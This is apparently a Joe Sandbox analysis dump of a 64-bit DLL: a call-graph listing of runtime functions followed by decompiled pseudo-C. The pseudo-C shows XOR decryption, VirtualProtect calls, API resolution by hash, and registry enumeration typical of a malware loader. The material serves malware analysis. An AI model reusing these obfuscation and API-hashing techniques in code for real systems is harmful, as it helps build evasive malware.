7ffc130ed9d6 11059 7ffc130ee114 __free_lconv_num 15 API calls 11058->11059 11060 7ffc130ed8e4 11059->11060 11060->11042 11061 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11061->11066 11062 7ffc130ed9c7 11081 7ffc130eda14 11062->11081 11066->11058 11066->11061 11066->11062 11067 7ffc130ed9fe 11066->11067 11070 7ffc130ee114 __free_lconv_num 15 API calls 11066->11070 11072 7ffc130ee1b4 11066->11072 11069 7ffc130ee5a0 _invalid_parameter_noinfo 17 API calls 11067->11069 11068 7ffc130ee114 __free_lconv_num 15 API calls 11068->11058 11071 7ffc130eda10 11069->11071 11070->11066 11073 7ffc130ee1c1 11072->11073 11074 7ffc130ee1cb 11072->11074 11073->11074 11078 7ffc130ee1e6 11073->11078 11075 7ffc130ee6a0 _get_daylight 15 API calls 11074->11075 11076 7ffc130ee1d2 11075->11076 11077 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11076->11077 11079 7ffc130ee1de 11077->11079 11078->11079 11080 7ffc130ee6a0 _get_daylight 15 API calls 11078->11080 11079->11066 11080->11076 11082 7ffc130eda19 11081->11082 11083 7ffc130ed9cf 11081->11083 11084 7ffc130eda42 11082->11084 11086 7ffc130ee114 __free_lconv_num 15 API calls 11082->11086 11083->11068 11085 7ffc130ee114 __free_lconv_num 15 API calls 11084->11085 11085->11083 11086->11082 11941 7ffc130efe2c 11942 7ffc130efe54 11941->11942 11943 7ffc130efe4d 11941->11943 11944 7ffc130efe5b 11942->11944 11945 7ffc130efe8d 11942->11945 11946 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11944->11946 11945->11943 11952 7ffc130f0b44 11945->11952 11947 7ffc130efe66 11946->11947 11949 7ffc130ee114 __free_lconv_num 15 API calls 11947->11949 11949->11943 11950 7ffc130efeb8 11951 7ffc130ee114 __free_lconv_num 15 API calls 11950->11951 11951->11943 11953 7ffc130f0b4c 11952->11953 11954 7ffc130f0b8b 11953->11954 11955 7ffc130f0b7c 11953->11955 11956 7ffc130f0b95 11954->11956 11961 7ffc130f3918 11954->11961 11957 7ffc130ee6a0 _get_daylight 15 API calls 11955->11957 11968 7ffc130f3954 11956->11968 11960 7ffc130f0b81 __scrt_fastfail 11957->11960 
11960->11950 11962 7ffc130f393a HeapSize 11961->11962 11963 7ffc130f3921 11961->11963 11964 7ffc130ee6a0 _get_daylight 15 API calls 11963->11964 11965 7ffc130f3926 11964->11965 11966 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11965->11966 11967 7ffc130f3931 11966->11967 11967->11956 11969 7ffc130f3969 11968->11969 11970 7ffc130f3973 11968->11970 11971 7ffc130ee154 _onexit 16 API calls 11969->11971 11972 7ffc130f3978 11970->11972 11978 7ffc130f397f __vcrt_getptd_noexit 11970->11978 11977 7ffc130f3971 11971->11977 11974 7ffc130ee114 __free_lconv_num 15 API calls 11972->11974 11973 7ffc130f39be 11976 7ffc130ee6a0 _get_daylight 15 API calls 11973->11976 11974->11977 11975 7ffc130f39a8 HeapReAlloc 11975->11977 11975->11978 11976->11977 11977->11960 11978->11973 11978->11975 11979 7ffc130f0f5c __vcrt_getptd_noexit 2 API calls 11978->11979 11979->11978 11186 7ffc130feaa7 11187 7ffc130eb888 12 API calls 11186->11187 11188 7ffc130feab5 11187->11188 10747 7ffc130eb5a0 10748 7ffc130eb5c6 10747->10748 10749 7ffc130eb5dd dllmain_raw 10748->10749 10751 7ffc130eb5ce 10748->10751 10756 7ffc130eb5fd 10748->10756 10750 7ffc130eb5f0 10749->10750 10749->10751 10760 7ffc130eb3a0 10750->10760 10753 7ffc130eb64a 10753->10751 10754 7ffc130eb3a0 62 API calls 10753->10754 10755 7ffc130eb660 10754->10755 10755->10751 10757 7ffc130eb66a dllmain_raw 10755->10757 10756->10751 10756->10753 10758 7ffc130eb3a0 62 API calls 10756->10758 10757->10751 10759 7ffc130eb63d dllmain_raw 10758->10759 10759->10753 10761 7ffc130eb3a8 10760->10761 10767 7ffc130eb3e1 __scrt_acquire_startup_lock 10760->10767 10762 7ffc130eb3d5 10761->10762 10763 7ffc130eb3ad 10761->10763 10792 7ffc130eb89c 10762->10792 10764 7ffc130eb3c8 __scrt_dllmain_crt_thread_attach 10763->10764 10765 7ffc130eb3b2 10763->10765 10766 7ffc130eb3c6 10764->10766 10769 7ffc130eb3b7 10765->10769 10807 7ffc130eb7dc 10765->10807 10766->10756 10771 7ffc130eb565 10767->10771 10772 7ffc130ebc0c __scrt_fastfail 6 API calls 10767->10772 10782 
7ffc130eb53a 10767->10782 10769->10756 10819 7ffc130eb858 10771->10819 10772->10771 10774 7ffc130eb56a 10824 7ffc130eb888 10774->10824 10775 7ffc130eb412 __scrt_acquire_startup_lock 10777 7ffc130eb43e 10775->10777 10788 7ffc130eb416 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 10775->10788 10812 7ffc130ebc0c 10775->10812 10800 7ffc130eb79c 10777->10800 10779 7ffc130eb575 __scrt_release_startup_lock 10829 7ffc130eba74 10779->10829 10782->10756 10783 7ffc130eb44d _RTC_Initialize 10783->10788 10803 7ffc130ebaf0 10783->10803 10787 7ffc130eb467 10789 7ffc130ebaf0 35 API calls 10787->10789 10788->10756 10790 7ffc130eb473 __scrt_initialize_default_local_stdio_options 10789->10790 10790->10788 10791 7ffc130eb48f __scrt_dllmain_after_initialize_c 10790->10791 10791->10788 10793 7ffc130eb8be __isa_available_init 10792->10793 10833 7ffc130ec7dc 10793->10833 10799 7ffc130eb8c7 10799->10775 10920 7ffc130eb8e8 10800->10920 10802 7ffc130eb7a7 10802->10783 10925 7ffc130ebaa0 10803->10925 10805 7ffc130eb462 10806 7ffc130ebbb4 InitializeSListHead 10805->10806 10940 7ffc130ee0b8 10807->10940 10813 7ffc130ebc2d __scrt_fastfail 10812->10813 10814 7ffc130ebc4d RtlCaptureContext RtlLookupFunctionEntry 10813->10814 10815 7ffc130ebc76 RtlVirtualUnwind 10814->10815 10816 7ffc130ebcb2 __scrt_fastfail 10814->10816 10815->10816 10817 7ffc130ebce4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10816->10817 10818 7ffc130ebd36 10817->10818 10818->10777 10820 7ffc130eb861 __scrt_release_startup_lock 10819->10820 10822 7ffc130eb875 10820->10822 11011 7ffc130edb0c 10820->11011 10822->10774 11019 7ffc130ee0dc 10824->11019 10827 7ffc130eca7c __vcrt_uninitialize_ptd 6 API calls 10828 7ffc130ec861 10827->10828 10828->10779 10830 7ffc130eba85 __scrt_uninitialize_crt 10829->10830 10831 7ffc130eba97 10830->10831 10832 7ffc130ec838 __vcrt_uninitialize 8 API calls 10830->10832 10831->10782 10832->10831 10834 7ffc130ec7e5 
__vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 10833->10834 10853 7ffc130ecaa0 10834->10853 10837 7ffc130eb8c3 10837->10799 10841 7ffc130ee090 10837->10841 10842 7ffc130f0e70 10841->10842 10843 7ffc130eb8d0 10842->10843 10904 7ffc130f0df4 10842->10904 10843->10799 10845 7ffc130ec838 10843->10845 10846 7ffc130ec840 10845->10846 10847 7ffc130ec851 10845->10847 10848 7ffc130eca7c __vcrt_uninitialize_ptd 6 API calls 10846->10848 10847->10799 10849 7ffc130ec845 10848->10849 10850 7ffc130ecae8 __vcrt_uninitialize_locks DeleteCriticalSection 10849->10850 10851 7ffc130ec84a 10850->10851 10916 7ffc130ecf10 10851->10916 10854 7ffc130ecaa8 10853->10854 10856 7ffc130ecad9 10854->10856 10857 7ffc130ec7ef 10854->10857 10870 7ffc130ece4c 10854->10870 10858 7ffc130ecae8 __vcrt_uninitialize_locks DeleteCriticalSection 10856->10858 10857->10837 10859 7ffc130eca3c 10857->10859 10858->10857 10885 7ffc130ecce8 10859->10885 10861 7ffc130eca4c 10863 7ffc130ec7fc 10861->10863 10890 7ffc130ecde4 10861->10890 10863->10837 10866 7ffc130ecae8 10863->10866 10864 7ffc130eca69 10864->10863 10895 7ffc130eca7c 10864->10895 10867 7ffc130ecb13 10866->10867 10868 7ffc130ecaf6 DeleteCriticalSection 10867->10868 10869 7ffc130ecb17 10867->10869 10868->10867 10869->10837 10875 7ffc130ecb20 10870->10875 10873 7ffc130ecea3 InitializeCriticalSectionAndSpinCount 10874 7ffc130ece8f 10873->10874 10874->10854 10876 7ffc130ecb86 10875->10876 10877 7ffc130ecb81 10875->10877 10876->10873 10876->10874 10877->10876 10878 7ffc130ecbb9 LoadLibraryExW 10877->10878 10883 7ffc130ecc4e 10877->10883 10884 7ffc130ecc2c FreeLibrary 10877->10884 10878->10877 10879 7ffc130ecbdf GetLastError 10878->10879 10879->10877 10881 7ffc130ecbea LoadLibraryExW 10879->10881 10880 7ffc130ecc5d GetProcAddress 10880->10876 10882 7ffc130ecc75 10880->10882 10881->10877 10882->10876 10883->10876 10883->10880 10884->10877 10886 7ffc130ecb20 try_get_function 5 API calls 10885->10886 10887 7ffc130ecd14 10886->10887 
10888 7ffc130ecd2b TlsAlloc 10887->10888 10889 7ffc130ecd1c 10887->10889 10888->10889 10889->10861 10891 7ffc130ecb20 try_get_function 5 API calls 10890->10891 10892 7ffc130ece17 10891->10892 10893 7ffc130ece30 TlsSetValue 10892->10893 10894 7ffc130ece1f 10892->10894 10893->10894 10894->10864 10896 7ffc130eca8b 10895->10896 10897 7ffc130eca90 10895->10897 10899 7ffc130ecd3c 10896->10899 10897->10863 10900 7ffc130ecb20 try_get_function 5 API calls 10899->10900 10901 7ffc130ecd67 10900->10901 10902 7ffc130ecd7d TlsFree 10901->10902 10903 7ffc130ecd6f 10901->10903 10902->10903 10903->10897 10915 7ffc130ef2b0 EnterCriticalSection 10904->10915 10906 7ffc130f0e04 10907 7ffc130f3ac0 33 API calls 10906->10907 10908 7ffc130f0e0d 10907->10908 10909 7ffc130f0c0c 35 API calls 10908->10909 10914 7ffc130f0e1b 10908->10914 10911 7ffc130f0e16 10909->10911 10910 7ffc130ef304 abort LeaveCriticalSection 10912 7ffc130f0e27 10910->10912 10913 7ffc130f0cf8 GetStdHandle GetFileType 10911->10913 10912->10842 10913->10914 10914->10910 10917 7ffc130ecf14 10916->10917 10919 7ffc130ecf48 10916->10919 10918 7ffc130ecf2e FreeLibrary 10917->10918 10917->10919 10918->10917 10919->10847 10921 7ffc130eb9a6 10920->10921 10922 7ffc130eb900 __scrt_initialize_onexit_tables __scrt_release_startup_lock 10920->10922 10923 7ffc130ebc0c __scrt_fastfail 6 API calls 10921->10923 10922->10802 10924 7ffc130eb9b0 10923->10924 10926 7ffc130ebacf 10925->10926 10928 7ffc130ebac5 _onexit 10925->10928 10929 7ffc130edf14 10926->10929 10928->10805 10932 7ffc130edad0 10929->10932 10939 7ffc130ef2b0 EnterCriticalSection 10932->10939 10946 7ffc130ef090 10940->10946 10943 7ffc130ec824 10998 7ffc130ec934 10943->10998 10947 7ffc130eb7e5 10946->10947 10948 7ffc130ef0a1 10946->10948 10947->10943 10949 7ffc130ef5bc _get_daylight 6 API calls 10948->10949 10950 7ffc130ef0a6 10949->10950 10950->10947 10951 7ffc130ef614 _get_daylight 6 API calls 10950->10951 10952 7ffc130ef0bb 10951->10952 10956 7ffc130eef30 10952->10956 10957 
7ffc130eef72 10956->10957 10958 7ffc130eef7a 10956->10958 10959 7ffc130ee114 __free_lconv_num 15 API calls 10957->10959 10960 7ffc130ee114 __free_lconv_num 15 API calls 10958->10960 10959->10958 10961 7ffc130eef87 10960->10961 10962 7ffc130ee114 __free_lconv_num 15 API calls 10961->10962 10963 7ffc130eef94 10962->10963 10964 7ffc130ee114 __free_lconv_num 15 API calls 10963->10964 10965 7ffc130eefa1 10964->10965 10966 7ffc130ee114 __free_lconv_num 15 API calls 10965->10966 10967 7ffc130eefae 10966->10967 10968 7ffc130ee114 __free_lconv_num 15 API calls 10967->10968 10969 7ffc130eefbb 10968->10969 10970 7ffc130ee114 __free_lconv_num 15 API calls 10969->10970 10971 7ffc130eefc8 10970->10971 10972 7ffc130ee114 __free_lconv_num 15 API calls 10971->10972 10973 7ffc130eefd5 10972->10973 10974 7ffc130ee114 __free_lconv_num 15 API calls 10973->10974 10975 7ffc130eefe5 10974->10975 10976 7ffc130ee114 __free_lconv_num 15 API calls 10975->10976 10977 7ffc130eeff5 10976->10977 10982 7ffc130eed18 10977->10982 10996 7ffc130ef2b0 EnterCriticalSection 10982->10996 10999 7ffc130eb7ea 10998->10999 11000 7ffc130ec948 10998->11000 10999->10766 11001 7ffc130ec952 11000->11001 11006 7ffc130ecd90 11000->11006 11003 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11001->11003 11004 7ffc130ec962 11003->11004 11004->10999 11005 7ffc130ee114 __free_lconv_num 15 API calls 11004->11005 11005->10999 11007 7ffc130ecb20 try_get_function 5 API calls 11006->11007 11008 7ffc130ecdbb 11007->11008 11009 7ffc130ecdd1 TlsGetValue 11008->11009 11010 7ffc130ecdc3 11008->11010 11009->11010 11010->11001 11018 7ffc130ef2b0 EnterCriticalSection 11011->11018 11022 7ffc130ef244 11019->11022 11023 7ffc130ef253 11022->11023 11024 7ffc130eb893 11022->11024 11026 7ffc130ef564 11023->11026 11024->10827 11027 7ffc130ef320 __vcrt_uninitialize_ptd 5 API calls 11026->11027 11028 7ffc130ef58f 11027->11028 11029 7ffc130ef5a6 TlsFree 11028->11029 11030 7ffc130ef597 11028->11030 11029->11030 11030->11024 11980 7ffc130f3358 11981 
7ffc130f05f8 49 API calls 11980->11981 11982 7ffc130f3361 11981->11982 11189 201640c1730 11190 201640c908c SetLastError 11189->11190 11191 201640c1765 11190->11191 11192 201640c908c SetLastError 11191->11192 11199 201640c1a0c 11191->11199 11195 201640c17a5 11192->11195 11193 201640c908c SetLastError 11194 201640c1a28 11193->11194 11196 201640c1a69 11194->11196 11197 201640c908c SetLastError 11194->11197 11198 201640c908c SetLastError 11195->11198 11195->11199 11197->11196 11204 201640c17d4 11198->11204 11199->11193 11199->11194 11200 201640c908c SetLastError 11200->11204 11202 201640c19fe 11203 201640c908c SetLastError 11202->11203 11203->11199 11204->11194 11204->11199 11204->11200 11204->11202 11205 201640c5384 11204->11205 11206 201640c53b3 11205->11206 11207 201640c908c SetLastError 11206->11207 11208 201640c5426 11206->11208 11207->11206 11208->11204 11983 7ffc130f6754 11984 7ffc130f6769 CloseHandle 11983->11984 11985 7ffc130f676f 11983->11985 11984->11985 11986 201640c34a4 11987 201640c3699 11986->11987 11988 201640c34db 11986->11988 11988->11987 11989 201640c6c34 4 API calls 11988->11989 11990 201640c34ee 11989->11990 11990->11987 12006 201640c97a0 11990->12006 11992 201640c3684 11993 201640c3689 HeapFree 11992->11993 11993->11987 11994 201640c908c SetLastError 11996 201640c3501 11994->11996 11995 201640c3607 11997 201640c365a 11995->11997 12033 201640c69a0 11995->12033 11996->11992 11996->11994 11996->11995 11996->11997 12021 201640c8d50 11996->12021 12001 201640c908c SetLastError 11997->12001 12002 201640c366a HeapFree 12001->12002 12002->11993 12007 201640c908c SetLastError 12006->12007 12008 201640c97cf 12007->12008 12009 201640c989b 12008->12009 12010 201640c97e8 HeapAlloc 12008->12010 12009->11996 12010->12009 12011 201640c9807 12010->12011 12012 201640c908c SetLastError 12011->12012 12013 201640c9815 12012->12013 12014 201640c988b HeapFree 12013->12014 12015 201640c908c SetLastError 12013->12015 12014->12009 12016 201640c9837 12015->12016 12017 

                                Control-flow Graph

                                C-Code - Quality: 40%
                                			E00007FFC7FFC130E2380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
                                				void* __rsi;
                                				signed int _t119;
                                				signed int _t160;
                                				void* _t163;
                                				signed int _t172;
                                				signed long long _t180;
                                				signed long long _t200;
                                				signed long long _t201;
                                				void* _t202;
                                				void* _t204;
                                				long long _t206;
                                				void* _t208;
                                				void* _t209;
                                				void* _t219;
                                				void* _t223;
                                				void* _t225;
                                				void* _t227;
                                
                                				_t172 = __rax;
                                				goto 0x13101440;
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				_t219 = _t208;
                                				 *((long long*)(_t219 + 0x18)) = __rbx;
                                				 *((long long*)(_t219 + 0x20)) = _t206;
                                				_push(_t204);
                                				_t209 = _t208 - 0x60;
                                				r13d = __r9 + 0x6ab;
                                				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
                                				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
                                				r14d = __rcx + 0x37e1;
                                				r15d = __rdx + 0x1249;
                                				r14d =  <  ? __r9 - 0x2103 : r14d;
                                				if (r15d - _t206 + 0x3a59 > 0) goto 0x130e2709;
                                				 *((long long*)(_t219 + 8)) = __r12;
                                				_t163 = r14d - _t227 + 0x108;
                                				if (_t163 > 0) goto 0x130e25c8;
                                				 *((long long*)(_t219 - 0x60)) = 0x2032;
                                				r12d = 0x3189;
                                				 *(_t209 + 0x20) = 0x3595;
                                				r8d = r12d;
                                				r9d = 0x1f2c;
                                				E00007FFC7FFC130E9AC0(__r8, __rcx, __r8, _t206, _t227); // executed
                                				r11d = _t202 + 0x19d;
                                				 *(_t209 + 0x50) = __r8;
                                				r10d = _t225 - 0x1033;
                                				__r8[0x22] = _t172;
                                				 *(_t209 + 0x48) = _t223 - 0x3b8;
                                				_t160 = __rcx - 0x114f;
                                				 *(_t209 + 0x40) = r10d;
                                				r8d = __rcx - 0x2ad;
                                				 *(_t209 + 0x38) = r11d;
                                				r9d = _t225 - 0x16de;
                                				 *(_t209 + 0x30) = _t206 + 0x36e7;
                                				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
                                				 *(_t209 + 0x20) = _t160;
                                				E00007FFC7FFC130FF160(_t172, __r8, __r8, _t225, _t223, _t202);
                                				r8d = 0;
                                				if (_t163 == 0) goto 0x130e2589;
                                				r9d = r8d;
                                				asm("o16 nop [eax+eax]");
                                				_t200 = __r8[0x90];
                                				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
                                				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
                                				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
                                				if (__r8[0x78] != __r8[0xc]) goto 0x130e2568;
                                				__r8[0x32] = __r8[0x32] + 0xffffdfce;
                                				r8d = r8d + 1;
                                				_t180 = r8d;
                                				if (_t180 - _t200 < 0) goto 0x130e24f0;
                                				__r8[0x66] = __r8[0x66] | 0x0a01b449;
                                				_t119 = __r8[0x4c] ^ 0x0000127e;
                                				if (_t119 - r12d >= 0) goto 0x130e25b8;
                                				r12d = r12d - _t119;
                                				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
                                				__r8[0x56] = __r8[0x14];
                                				goto 0x130e2701;
                                				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x130e2624;
                                				_t201 = _t200 | __r8[0x2a];
                                				if (__r8[0x2e] - _t201 > 0) goto 0x130e2624;
                                				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x130e2610;
                                				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
                                				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x130e26ed;
                                				r10d = _t160;
                                				r11d = __r8[0x78];
                                				r15d = r15d - (__r8[6] ^ r15d);
                                				r11d = r11d - __r8[0x74];
                                				r11d = r11d + __r8[0x24];
                                				r14d = r14d *  *__r8;
                                				r15d = r15d + 0xea7;
                                				r10d = r10d - __r8[0x12];
                                				r15d = r15d ^ 0x00002598;
                                				r8d = __r8[4];
                                				r9d = _t160;
                                				r8d = r8d &  *(_t209 + 0xb8);
                                				r12d = 0x3189;
                                				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
                                				r9d = r9d | r12d;
                                				 *(_t209 + 0x50) = _t160 & 0x00003666;
                                				 *(_t209 + 0x48) = r11d;
                                				 *(_t209 + 0x40) = __r8;
                                				 *(_t209 + 0x38) = r10d;
                                				 *(_t209 + 0x30) = r15d;
                                				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
                                				 *(_t209 + 0x20) = r14d;
                                				E00007FFC7FFC130E2060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
                                				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
                                				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
                                			}





















                                APIs
                                • GetProcessHeap.KERNEL32 ref: 00007FFC13101456
                                • HeapAlloc.KERNEL32 ref: 00007FFC13101467
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7CFC
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7E18
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapProtectVirtual$AllocProcess
                                • String ID: 2 $6$62 $662 $7$8662
                                • API String ID: 3541638468-3329516171
                                • Opcode ID: 59bb83eef75242a5c0dbf160cfb2881c3e280effa3ab4466507c8ae61b5f1636
                                • Instruction ID: 799a62481cb79f975a68f88121b026e27988392592366ed8ebdcb442330c63ba
                                • Opcode Fuzzy Hash: 59bb83eef75242a5c0dbf160cfb2881c3e280effa3ab4466507c8ae61b5f1636
                                • Instruction Fuzzy Hash: 5232F2735182C18BE371CF29E44479EBBA4F788748F148129EA899BB59DB7CE954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                [Figure: control-flow graph of the function at 201640c37e0; legend: Executed / Not Executed]
                                C-Code - Quality: 41%
                                			E00000201201640C37E0(long long* __rax, long long __rcx, void* __r9) {
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t80;
                                				void* _t84;
                                				void* _t85;
                                				void* _t100;
                                				void* _t176;
                                				long long* _t222;
                                				long long* _t223;
                                				long long* _t224;
                                				long long _t225;
                                				intOrPtr _t226;
                                				long long* _t228;
                                				long long* _t229;
                                				void* _t230;
                                				void* _t288;
                                				long long _t289;
                                				void* _t291;
                                				void* _t294;
                                				intOrPtr _t295;
                                				intOrPtr _t296;
                                				void* _t300;
                                				void* _t301;
                                				void* _t303;
                                				void* _t310;
                                				void* _t313;
                                				long long _t314;
                                				void* _t315;
                                				void* _t316;
                                				long long _t319;
                                				long long* _t320;
                                				void* _t322;
                                				CHAR* _t327;
                                
                                				_t222 = __rax;
                                				 *((long long*)(_t300 + 8)) = __rcx;
                                				_t301 = _t300 - 0x248;
                                				_t292 =  *0x640cd458;
                                				_t295 =  *((intOrPtr*)( *0x640cd458 + 8));
                                				 *((long long*)(_t301 + 0x20)) =  *0x640cd448;
                                				 *(_t301 + 0x298) =  *0x640cd450;
                                				GetModuleHandleA(_t327);
                                				_t80 = E00000201201640C40F8(__rax,  *0x640cd458 + 0x18, _t303, _t313, _t322, _t319);
                                				r13d = 0;
                                				if (_t80 != r13d) goto 0x640c38bf;
                                				E00000201201640C908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t222 == _t319) goto 0x640c3866;
                                				 *_t222();
                                				goto 0x640c3869;
                                				_t223 = _t319;
                                				if (E00000201201640C40F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288) != r13d) goto 0x640c38bf;
                                				_t84 = E00000201201640C5FC8(_t223, _t230,  *0x640cd448 + 0x201640d1082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
                                				if (_t84 != r13d) goto 0x640c38bf;
                                				_t85 = E00000201201640C5FC8(_t223, _t230,  *0x640cd448 + 0x201640d1079, _t292 + 0x20, _t292, _t295); // executed
                                				if (_t85 != r13d) goto 0x640c38bf;
                                				if (E00000201201640C5FC8(_t223, _t230,  *0x640cd448 + 0x201640d1092, _t292 + 0x30, _t292, _t295) != r13d) goto 0x640c3cc0;
                                				HeapAlloc(??, ??, ??);
                                				_t289 = _t223;
                                				if (_t223 == _t319) goto 0x640c3cbb;
                                				E00000201201640C487A();
                                				E00000201201640C908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
                                				if (_t223 == _t319) goto 0x640c390d;
                                				 *_t223();
                                				_t24 = _t289 + 0xa8; // 0xa8
                                				_t224 = _t24;
                                				 *_t224 = _t224;
                                				 *((long long*)(_t289 + 0xb0)) = _t224;
                                				 *(_t289 + 0x9c) = r13d;
                                				 *(_t289 + 0xa0) = r13d;
                                				 *(_t289 + 0x98) = r13d;
                                				E00000201201640C638C(_t224, _t230, _t292, _t230);
                                				E00000201201640C908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t224 == _t319) goto 0x640c395e;
                                				r9d = 0;
                                				r8d = 0;
                                				 *_t224();
                                				goto 0x640c3961;
                                				_t225 = _t319;
                                				 *((long long*)(_t289 + 0x28)) = _t225;
                                				if (_t225 != _t319) goto 0x640c398e;
                                				E00000201201640C908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t225 == _t319) goto 0x640c3984;
                                				 *_t225();
                                				goto 0x640c3caa;
                                				goto 0x640c3cac;
                                				r8d = 0x1102;
                                				HeapAlloc(??, ??, ??);
                                				_t320 = _t225;
                                				_t34 = _t295 + 0x7f; // 0x7f
                                				r12d = _t34;
                                				if (_t225 == _t295) goto 0x640c3a8e;
                                				 *_t225 = 0;
                                				E00000201201640C908C(0x3d06c463, _t225,  *((intOrPtr*)( *0x640cd458 + 0x20)));
                                				if (_t225 == _t295) goto 0x640c39fb;
                                				RegOpenKeyW(??, ??, ??); // executed
                                				goto 0x640c39fe;
                                				if (r12d != 0) goto 0x640c3a7e;
                                				E00000201201640C908C(0xdf514773, _t225,  *((intOrPtr*)( *0x640cd458 + 0x20)));
                                				if (_t225 == 0) goto 0x640c3a30;
                                				r9d = 0x104;
                                				RegEnumKeyW(??, ??, ??, ??); // executed
                                				goto 0x640c3a33;
                                				if (r12d != 0) goto 0x640c3a4c;
                                				_t100 = E00000201201640C6644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
                                				if (_t100 == 0) goto 0x640c3a02;
                                				if (_t100 != 0x103) goto 0x640c3a5d;
                                				 *0x640cd438 = _t320;
                                				E00000201201640C908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0x640cd458 + 0x20)));
                                				if (_t225 == 0) goto 0x640c3a7a;
                                				RegCloseKey(??); // executed
                                				if (0 == 0) goto 0x640c3a93;
                                				HeapFree(??, ??, ??);
                                				goto 0x640c3a93;
                                				r13d = 0;
                                				if (8 != r13d) goto 0x640c3cb1;
                                				_t296 =  *0x640cd448;
                                				_t47 = _t320 + 8; // 0x8
                                				r8d = _t47;
                                				0x640c47b0();
                                				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
                                				if (E00000201201640CA0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x201640c0000 + _t296 + 0x11188) == r13d) goto 0x640c3b05;
                                				_t310 = 0x201640c0000 + _t296 + 0x111e0;
                                				if (E00000201201640CA0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0x640c3cb1;
                                				_t57 = _t289 + 8; // 0x8
                                				_t286 = _t57;
                                				if (E00000201201640C5058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0x640c3b4b;
                                				E00000201201640C405C(_t230, _t289, _t57, _t289, _t292, _t296);
                                				 *((long long*)(_t289 + 0x30)) = _t225;
                                				if (_t225 == _t320) goto 0x640c3b4b;
                                				_t59 = _t289 + 8; // 0x8
                                				E00000201201640C405C(_t230, _t59, _t57, _t289, _t292, _t296);
                                				 *((long long*)(_t289 + 0x38)) = _t225;
                                				_t144 =  !=  ? r13d : 8;
                                				_t207 = ( !=  ? r13d : 8) - r13d;
                                				if (( !=  ? r13d : 8) != r13d) goto 0x640c3cb1;
                                				if (E00000201201640CA7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0x640c3b6b;
                                				goto 0x640c3cb1;
                                				_t226 =  *((intOrPtr*)(_t301 + 0x20));
                                				r9d =  *(_t301 + 0x298);
                                				_t314 = _t226 + 0x201640cf000;
                                				r8d =  *(_t314 + 2) & 0x0000ffff;
                                				if (_t226 - _t310 + 8 <= 0) goto 0x640c3baf;
                                				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0x640c3bb2;
                                				E00000201201640C4D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
                                				goto 0x640c3bb2;
